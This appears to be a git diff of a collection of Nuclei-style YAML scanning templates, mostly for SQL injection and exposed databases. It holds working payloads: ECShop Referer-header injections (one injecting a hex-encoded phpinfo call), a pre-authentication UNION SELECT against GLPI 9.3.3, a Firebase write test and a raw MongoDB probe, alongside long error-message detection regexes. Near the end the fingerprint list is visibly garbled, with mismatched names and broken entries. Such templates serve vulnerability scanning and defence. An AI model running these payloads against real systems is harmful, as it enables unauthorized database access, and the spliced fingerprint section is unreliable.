verified: true
fofa-query: app="ECShop"
tags: sqli,php,ecshop
-
requests:
- raw:
- |
@@ -23,13 +21,11 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
-
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
-
stop-at-first-match: true
matchers-condition: or
matchers:
@@ -40,7 +36,6 @@ requests:
- '[0] => Array'
- 'MySQL server error report:Array'
condition: and
-
- type: word
words:
- "PHP Extension"
diff --git a/poc/sql/error-based-sql-injection-7249.yaml b/poc/sql/error-based-sql-injection-7249.yaml
index f988118325..4cb4621ef2 100644
--- a/poc/sql/error-based-sql-injection-7249.yaml
+++ b/poc/sql/error-based-sql-injection-7249.yaml
@@ -1,14 +1,23 @@
id: error-based-sql-injection
+
info:
name: Error based SQL injection
author: geeknik
- severity: high
- description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml.
- tags: sqli
-requests:
+ severity: critical
+ description: A SQL injection vulnerability was identified based on an error message returned by the server.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cwe-id: CWE-89
+ metadata:
+ max-request: 1
+ tags: sqli,generic,error
+
+http:
- method: GET
path:
- "{{BaseURL}}/'"
+
matchers-condition: and
matchers:
- type: word
@@ -17,6 +26,7 @@ requests:
# False Positive
part: body
negative: true
+
- type: regex
regex:
# MySQL
@@ -201,6 +211,7 @@ requests:
- "Virtuoso S0002 Error"
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
condition: or
+
extractors:
- type: regex
name: MySQL
@@ -217,20 +228,24 @@ requests:
- "Pdo[./_\\\\]Mysql"
- "MySqlException"
- "SQLSTATE[\\d+]: Syntax error or access violation"
+
- type: regex
name: MariaDB
regex:
- "check the manual that (corresponds to|fits) your MariaDB server version"
+
- type: regex
name: Drizzel
regex:
- "check the manual that (corresponds to|fits) your Drizzle server version"
+
- type: regex
name: MemSQL
regex:
- "MemSQL does not support this type of query"
- "is not supported by MemSQL"
- "unsupported nested scalar subselect"
+
- type: regex
name: PostgreSQL
regex:
@@ -246,6 +261,7 @@ requests:
- "org\\.postgresql\\.jdbc"
- "Pdo[./_\\\\]Pgsql"
- "PSQLException"
+
- type: regex
name: MicrosoftSQLServer
regex:
@@ -268,6 +284,7 @@ requests:
- "Pdo[./_\\\\](Mssql|SqlSrv)"
- "SQL(Srv|Server)Exception"
- "Unclosed quotation mark after the character string"
+
- type: regex
name: MicrosoftAccess
regex:
@@ -276,6 +293,7 @@ requests:
- "Access Database Engine"
- "ODBC Microsoft Access"
- "Syntax error \\(missing operator\\) in query expression"
+
- type: regex
name: Oracle
regex:
@@ -290,6 +308,7 @@ requests:
- "Zend_Db_(Adapter|Statement)_Oracle_Exception"
- "Pdo[./_\\\\](Oracle|OCI)"
- "OracleException"
+
- type: regex
name: IBMDB2
regex:
@@ -302,6 +321,7 @@ requests:
- "Pdo[./_\\\\]Ibm"
- "DB2Exception"
- "ibm_db_dbi\\.ProgrammingError"
+
- type: regex
name: Informix
regex:
@@ -313,6 +333,7 @@ requests:
- "weblogic\\.jdbc\\.informix"
- "Pdo[./_\\\\]Informix"
- "IfxException"
+
- type: regex
name: Firebird
regex:
@@ -320,6 +341,7 @@ requests:
- "Warning.*?\\Wibase_"
- "org\\.firebirdsql\\.jdbc"
- "Pdo[./_\\\\]Firebird"
+
- type: regex
name: SQLite
regex:
@@ -334,6 +356,7 @@ requests:
- "org\\.sqlite\\.JDBC"
- "Pdo[./_\\\\]Sqlite"
- "SQLiteException"
+
- type: regex
name: SAPMaxDB
regex:
@@ -343,6 +366,7 @@ requests:
- "-3014.*?Invalid end of SQL statement"
- "com\\.sap\\.dbtech\\.jdbc"
- "\\[-3008\\].*?: Invalid keyword or missing delimiter"
+
- type: regex
name: Sybase
regex:
@@ -352,6 +376,7 @@ requests:
- "SybSQLException"
- "Sybase\\.Data\\.AseClient"
- "com\\.sybase\\.jdbc"
+
- type: regex
name: Ingres
regex:
@@ -359,6 +384,7 @@ requests:
- "Ingres SQLSTATE"
- "Ingres\\W.*?Driver"
- "com\\.ingres\\.gcf\\.jdbc"
+
- type: regex
name: FrontBase
regex:
@@ -366,29 +392,34 @@ requests:
- "com\\.frontbase\\.jdbc"
- "Syntax error 1. Missing"
- "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\."
+
- type: regex
name: HSQLDB
regex:
- "Unexpected end of command in statement \\["
- "Unexpected token.*?in statement \\["
- "org\\.hsqldb\\.jdbc"
+
- type: regex
name: H2
regex:
- "org\\.h2\\.jdbc"
- "\\[42000-192\\]"
+
- type: regex
name: MonetDB
regex:
- "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)"
- "\\[MonetDB\\]\\[ODBC Driver"
- "nl\\.cwi\\.monetdb\\.jdbc"
+
- type: regex
name: ApacheDerby
regex:
- "Syntax error: Encountered"
- "org\\.apache\\.derby"
- "ERROR 42X01"
+
- type: regex
name: Vertica
regex:
@@ -397,12 +428,14 @@ requests:
- "com\\.vertica\\.jdbc"
- "org\\.jkiss\\.dbeaver\\.ext\\.vertica"
- "com\\.vertica\\.dsi\\.dataengine"
+
- type: regex
name: Mckoi
regex:
- "com\\.mckoi\\.JDBCDriver"
- "com\\.mckoi\\.database\\.jdbc"
- "<REGEX_LITERAL>"
+
- type: regex
name: Presto
regex:
@@ -410,29 +443,35 @@ requests:
- "io\\.prestosql\\.jdbc"
- "com\\.simba\\.presto\\.jdbc"
- "UNION query has different number of fields: \\d+, \\d+"
+
- type: regex
name: Altibase
regex:
- "Altibase\\.jdbc\\.driver"
+
- type: regex
name: MimerSQL
regex:
- "com\\.mimer\\.jdbc"
- "Syntax error,[^\\n]+assumed to mean"
+
- type: regex
name: CrateDB
regex:
- "io\\.crate\\.client\\.jdbc"
+
- type: regex
name: Cache
regex:
- "encountered after end of query"
- "A comparison operator is required here"
+
- type: regex
name: RaimaDatabaseManager
regex:
- "-10048: Syntax error"
- "rdmStmtPrepare\\(.+?\\) returned"
+
- type: regex
name: Virtuoso
regex:
@@ -441,3 +480,4 @@ requests:
- "SQ200: No table "
- "Virtuoso S0002 Error"
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
+# digest: 4a0a0047304502202747aa1e6dea39e23e6100799bf4245c850a07895e151d189123dc27803dc2e5022100c8ebed9058d9d8dc5f249a93d40c1391ef22f5218d67cfa621679988285968dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/sql/exposed-adb-7280.yaml b/poc/sql/exposed-adb-7280.yaml
index e0a43b6ba2..9a1aedf542 100644
--- a/poc/sql/exposed-adb-7280.yaml
+++ b/poc/sql/exposed-adb-7280.yaml
@@ -3,7 +3,7 @@ info:
name: Exposed Android Debug Bridge
author: pdteam,pikpikcu
severity: critical
- tags: network,adb,rce,android
+ tags: network,adb,rce
reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
network:
- inputs:
diff --git a/poc/sql/exposed-mysql-initial-7324.yaml b/poc/sql/exposed-mysql-initial-7324.yaml
index f644e79c49..3df4611d59 100644
--- a/poc/sql/exposed-mysql-initial-7324.yaml
+++ b/poc/sql/exposed-mysql-initial-7324.yaml
@@ -4,7 +4,8 @@ info:
name: Exposed mysql.initial
author: ELSFA7110
severity: info
- reference: https://hackerone.com/reports/1081817
+ reference:
+ - https://hackerone.com/reports/1081817
tags: config,exposure
requests:
diff --git a/poc/sql/exposed-sqlite-manager-7350.yaml b/poc/sql/exposed-sqlite-manager-7350.yaml
index 6a86dc4ca9..cff80e3ad5 100644
--- a/poc/sql/exposed-sqlite-manager-7350.yaml
+++ b/poc/sql/exposed-sqlite-manager-7350.yaml
@@ -1,19 +1,15 @@
id: exposed-sqlite-manager
-
info:
name: SQLiteManager
author: dhiyaneshDK
severity: medium
- reference:
- - https://www.exploit-db.com/ghdb/5003
+ reference: https://www.exploit-db.com/ghdb/5003
tags: sqlite
-
requests:
- method: GET
path:
- '{{BaseURL}}/sqlite/'
- '{{BaseURL}}/sqlitemanager/'
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql/glpi-9.3.3-sql-injection(1).yaml b/poc/sql/glpi-9.3.3-sql-injection(1).yaml
index 98a2a439f1..e7c97f72d9 100644
--- a/poc/sql/glpi-9.3.3-sql-injection(1).yaml
+++ b/poc/sql/glpi-9.3.3-sql-injection(1).yaml
@@ -1,25 +1,30 @@
-id: GLPI_SQL_Injection
-info:
- author: RedTeamBrasil
- description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
- name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
- reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
- severity: high
- tags: "glpi,cve,sqli"
-requests:
- - matchers:
- - part: body
- type: word
- words:
- - "-MariaDB-"
- max-redirects: 3
- method: GET
- path:
- - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- redirects: true
- extractors:
- - type: regex
- part: body
- regex:
- - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
+---
+id: GLPI_SQL_Injection
+
+info:
+ author: RedTeamBrasil
+ description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
+ reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
+ severity: high
+ tags: "glpi,cve,sqli"
+
+requests:
+ -
+ matchers:
+ -
+ part: body
+ type: word
+ words:
+ - "-MariaDB-"
+ max-redirects: 3
+ method: GET
+ path:
+ - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ redirects: true
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
\ No newline at end of file
diff --git a/poc/sql/glpi-9.3.3-sql-injection.yaml b/poc/sql/glpi-9.3.3-sql-injection.yaml
new file mode 100644
index 0000000000..98a2a439f1
--- /dev/null
+++ b/poc/sql/glpi-9.3.3-sql-injection.yaml
@@ -0,0 +1,25 @@
+id: GLPI_SQL_Injection
+info:
+ author: RedTeamBrasil
+ description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
+ reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
+ severity: high
+ tags: "glpi,cve,sqli"
+requests:
+ - matchers:
+ - part: body
+ type: word
+ words:
+ - "-MariaDB-"
+ max-redirects: 3
+ method: GET
+ path:
+ - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ redirects: true
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
diff --git a/poc/sql/insecure-firebase-database-8161.yaml b/poc/sql/insecure-firebase-database-8161.yaml
index 31850d7a49..6bf3294029 100644
--- a/poc/sql/insecure-firebase-database-8161.yaml
+++ b/poc/sql/insecure-firebase-database-8161.yaml
@@ -1,26 +1,32 @@
id: insecure-firebase-database
info:
- name: Firebase Database Permissions Exploit Check
+ name: Insecure Firebase Database
author: rafaelwdornelas
severity: high
description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.
reference:
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
- tags: firebase
+ metadata:
+ verified: true
+ tags: firebase,google,misconfig
requests:
- raw:
- - | # REQUEST 1
- PUT /nuclei.json HTTP/1.1
+ - |
+ PUT /{{randstr}}.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
- {"email":"{{randstr}}@example.com","password":"{{randstr_1}}","username":"{{randstr_2}}","nuclei":"insecure-firebase-database"}
+ {"id":"insecure-firebase-database"}
+ - |
+ GET /{{randstr}}.json HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - "insecure-firebase-database"
+ - '{"id":"insecure-firebase-database"}'
- type: status
status:
- 200
diff --git a/poc/sql/jdbc-connection-string-8244.yaml b/poc/sql/jdbc-connection-string-8244.yaml
index 5176854480..53cc0bba82 100644
--- a/poc/sql/jdbc-connection-string-8244.yaml
+++ b/poc/sql/jdbc-connection-string-8244.yaml
@@ -1,15 +1,18 @@
id: jdbc-connection-string
+
info:
name: JDBC Connection String Disclosure
author: Ice3man
- severity: info
+ severity: unknown
tags: exposure,token
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
extractors:
- type: regex
part: body
regex:
- - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'
+ - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'
\ No newline at end of file
diff --git a/poc/sql/mongodb-detect-8921.yaml b/poc/sql/mongodb-detect-8921.yaml
index a81bd83ef0..9e08d299ab 100644
--- a/poc/sql/mongodb-detect-8921.yaml
+++ b/poc/sql/mongodb-detect-8921.yaml
@@ -3,8 +3,7 @@ info:
name: MongoDB Detection
author: pdteam
severity: info
- reference:
- - https://github.com/orleven/Tentacle
+ reference: https://github.com/orleven/Tentacle
tags: network,mongodb
network:
- inputs:
diff --git a/poc/sql/mongodb-unauth-8925.yaml b/poc/sql/mongodb-unauth-8925.yaml
index 469fd95eb9..9883dc2bca 100644
--- a/poc/sql/mongodb-unauth-8925.yaml
+++ b/poc/sql/mongodb-unauth-8925.yaml
@@ -1,14 +1,21 @@
id: mongodb-unauth
+
info:
name: Unauth MongoDB Disclosure
author: pdteam
severity: high
- reference: https://github.com/orleven/Tentacle
+ reference:
+ - https://github.com/orleven/Tentacle
+ - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
+ - https://www.mongodb.com/features/mongodb-authentication
+ remediation: Enable Authentication in MongoDB
tags: network,mongodb,unauth
+
network:
- inputs:
- data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000
type: hex
+
host:
- "{{Hostname}}"
- "{{Host}}:27017"
diff --git a/poc/sql/openerp-database-9278.yaml b/poc/sql/openerp-database-9278.yaml
index c1496427ba..7d9f2c6a84 100644
--- a/poc/sql/openerp-database-9278.yaml
+++ b/poc/sql/openerp-database-9278.yaml
@@ -1,18 +1,22 @@
id: openerp-database
+
info:
name: OpenERP database instances
author: impramodsargar
severity: info
- tags: openerp
+ tags: openerp,panel
+
requests:
- method: GET
path:
- "{{BaseURL}}/web/database/selector/"
+
matchers-condition: and
matchers:
- type: word
words:
- '
管理apusic应用服务器
- type: word
- part: server
+ part: header
name: apusic
words:
- - "Apusic Application Server"
+ - "Server: apusic application server"
- type: word
name: arab-portal
@@ -1796,7 +1788,8 @@ http:
- type: word
name: cerberus-helpdesk
words:
- -
+ -
- type: word
name: symantec-endpoint-protection-manager
words:
- -
+ - symantec endpoint protection manager
web access
- type: word
name: symantec-thawte_ssl_cert
@@ -12065,7 +12086,8 @@ http:
- type: word
name: synology-webstation
words:
- - id="paragraph">web station has been enabled. to finish setting up your website, please see the "web service
+ - id="paragraph">web station has been enabled. to finish setting up your website,
+ please see the "web service
- type: word
name: tab-and-link-manager
@@ -12187,7 +12209,8 @@ http:
- type: word
name: telenor-4g-router
words:
- - please power off and plug in (u)sim card. then power on again. or pin is permanently blocked, please contact the provider
+ - please power off and plug in (u)sim card. then power on again. or pin is permanently
+ blocked, please contact the provider
- type: word
name: teleradiology-telrads
@@ -12753,7 +12776,8 @@ http:
- type: word
name: turbo-seek
words:
- - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + mywidth + ",height=" + myheight +
+ - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width="
+ + mywidth + ",height=" + myheight +
- type: word
name: turbomail
@@ -12839,13 +12863,6 @@ http:
words:
- welcome to nginx on ubuntu!
- - type: word
- name: openeuler
- words:
- - symantec endpoint
+ protection manager
web access
+ -
- type: word
name: uniform-server
@@ -12946,7 +12964,8 @@ http:
- type: word
name: uniform-server
words:
- -
troy serial server |
troy + serial server |